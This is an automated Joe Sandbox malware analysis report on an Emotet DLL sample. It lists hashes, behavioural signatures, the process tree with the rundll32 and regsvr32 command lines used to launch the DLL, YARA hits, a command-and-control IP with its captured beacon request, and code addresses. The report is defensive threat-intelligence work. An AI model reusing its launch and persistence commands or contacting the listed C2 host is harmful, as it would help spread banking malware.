Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ns2al4764F

Overview

General Information

Sample Name:Ns2al4764F (renamed file extension from none to dll)
Analysis ID:626476
MD5:07cf30fbb8f6645454eed3f7781d1ae5
SHA1:3ea37e70f20524b481bcc0d33ebfc145c008925d
SHA256:672a3c846ca7630201810bd9317f38d270a259bb76fb27ed847137b0c4528f58
Tags:exetrojan
Infos:

Detection

Emotet
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 4080 cmdline: loaddll64.exe "C:\Users\user\Desktop\Ns2al4764F.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 5284 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 3024 cmdline: rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 920 cmdline: regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 2324 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 2420 cmdline: rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2296 cmdline: rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 5792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2296 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3000 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5860 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4364 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 408 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 244 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 276 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 2404 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6432 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.regsvr32.exe.620000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.rundll32.exe.14e051b0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.rundll32.exe.2be35aa0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  2.2.regsvr32.exe.ca0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    3.2.rundll32.exe.14e051b0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: Ns2al4764F.dllVirustotal: Detection: 35%Perma Link
                      Antivirus detection for URL or domain
                      Source: https://23.239.0.12/CAvira URL Cloud: Label: malware
                      Source: https://23.239.0.12/#mWwnAvira URL Cloud: Label: malware
                      Source: https://23.239.0.12/DAvira URL Cloud: Label: malware
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49764 version: TLS 1.2
                      Source: Ns2al4764F.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,5_2_000000018000D26C

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Dyz=DabvmfULUPwRS87n3NYaWAB5lbtM+RX1RWCxIsW5JR2ugrMjYBp820HE70OdzwJs7yvgQCtqT9ZajKoH765EieJsgJY5Ki8zTzKQ99Gho8WMqwDn4OyZsaEfNbr84GkPPx5HtU7nHZMAlr2v3mlg410lium/3Uzv2iMM+QbLckLf53rpF7ndEZLZxV5q4uD1NTdffI52CoPOk7Ky1CgFUQCgYCDOBhB/qP6OSm4ZCqhqrMM5PSKhRo5dTpg29g==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: regsvr32.exe, 00000005.00000002.758391409.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314103484.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.664499612.0000017546A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.405585902.0000021A89700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000014.00000002.664499612.0000017546A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.405585902.0000021A89700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000F.00000002.313306707.000001521A213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/#mWwn
                      Source: regsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/C
                      Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/D
                      Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000002.313436972.000001521A269000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.312935601.000001521A267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000002.313388422.000001521A253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313008479.000001521A24C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000F.00000002.313364509.000001521A242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313096828.000001521A241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000F.00000002.313364509.000001521A242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313096828.000001521A241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.313431355.000001521A264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.313306707.000001521A213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.313083570.000001521A245000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.313083570.000001521A245000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.313352467.000001521A23A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000F.00000002.313388422.000001521A253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313008479.000001521A24C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000017.00000003.383408735.0000021A897D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383363600.0000021A897D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383647935.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383604204.0000021A897BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383566783.0000021A8979C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,5_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Dyz=DabvmfULUPwRS87n3NYaWAB5lbtM+RX1RWCxIsW5JR2ugrMjYBp820HE70OdzwJs7yvgQCtqT9ZajKoH765EieJsgJY5Ki8zTzKQ99Gho8WMqwDn4OyZsaEfNbr84GkPPx5HtU7nHZMAlr2v3mlg410lium/3Uzv2iMM+QbLckLf53rpF7ndEZLZxV5q4uD1NTdffI52CoPOk7Ky1CgFUQCgYCDOBhB/qP6OSm4ZCqhqrMM5PSKhRo5dTpg29g==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49764 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 5.2.regsvr32.exe.620000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.14e051b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2be35aa0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.ca0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.14e051b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2be35aa0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.620000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.243462226.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.240757372.0000014E051B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.240813581.000002BE35AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\GfWDwmUjKsXua\cGZwFaJkDV.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\GfWDwmUjKsXua\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9FB6C2_2_00007FFFEFB9FB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9EB602_2_00007FFFEFB9EB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9A77C2_2_00007FFFEFB9A77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9AF702_2_00007FFFEFB9AF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB96F0C2_2_00007FFFEFB96F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9E6C02_2_00007FFFEFB9E6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9AA0C2_2_00007FFFEFB9AA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9B5CC2_2_00007FFFEFB9B5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB959442_2_00007FFFEFB95944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9895C2_2_00007FFFEFB9895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9FCA02_2_00007FFFEFB9FCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00C900002_2_00C90000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF42_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C202_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C0582_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800091002_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800079582_2_0000000180007958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C9642_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C6082_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800216182_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E282_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE82_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800220102_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800118342_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800238312_2_0000000180023831
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC482_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC482_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800244582_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800064582_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4602_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800298882_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA02_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A82_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB02_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B42_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B42_2_000000018000C4B4
